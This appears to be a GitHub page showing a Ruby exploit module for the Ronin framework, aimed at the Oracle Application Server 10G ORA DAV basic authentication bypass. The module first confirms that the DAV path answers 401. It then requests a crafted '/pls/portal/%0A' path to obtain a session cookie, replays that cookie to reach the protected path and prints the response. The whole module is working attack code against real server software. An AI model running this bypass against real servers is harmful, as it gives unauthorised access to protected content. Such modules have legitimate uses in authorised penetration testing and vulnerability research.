Skip to content
This repository

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
branch: master
Fetching contributors…

Octocat-spinner-32-eaf2f5

Cannot retrieve contributors at this time

executable file 65 lines (46 sloc) 1.545 kb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64
#!/usr/bin/env ronin-exploit -f

require 'ronin/exploits/http'

Ronin::Exploits::HTTP.object do

  cache do
    self.name = 'Oracle Application Server 10G ORA DAV Basic Authentication Bypass Vulnerability'
    self.version = '0.1'
    self.description = %{
This module sends tests for the Oracle Application Server 10G ORA DAV
Basic Authentication Bypass Vulnerability.
}

    licensed_under :mit

    author :name => 'CG', :organization => 'carnal0wnage'
  end

  build do
    @dav_path = '/dav_portal/portal/'
    @guest_path = '/pls/portal/%0A'
  end

  deploy do
    print_info "Testing for dav_portal authentication required"

    unless http_status(:path => @dav_path) == 401
      deploy_failed! "Did not receive a HTTP 401 response: #{@dav_path}"
    end

    print_info "Sending the bypass request ..."

    @res = http_get(:path => @guest_path)

    unless @res.code == '200'
      deploy_failed! "Did not receive a HTTP 200 response: #{@guest_path}"
    end

    if (@cookie = @res.headers['Set-Cookie'])
      print_debug "Received Cookie: %s", @cookie
    end

    print_info "Replaying the HTTP Request with Cookie ..."

    @res = http_get(
      :path => @dav_path,
      :headers => {
        :cookie => @cookie,
        :connection => 'keep-alive'
      }
    )

    unless @res.code == '200'
      @res.headers.each { |name,value| puts "#{name}: #{value}" }

      deploy_failed! "Could not replay HTTP Request for #{@dav_path}"
    end

    print_info "Response body:"
    puts @res.body
  end

end
Something went wrong with that request. Please try again.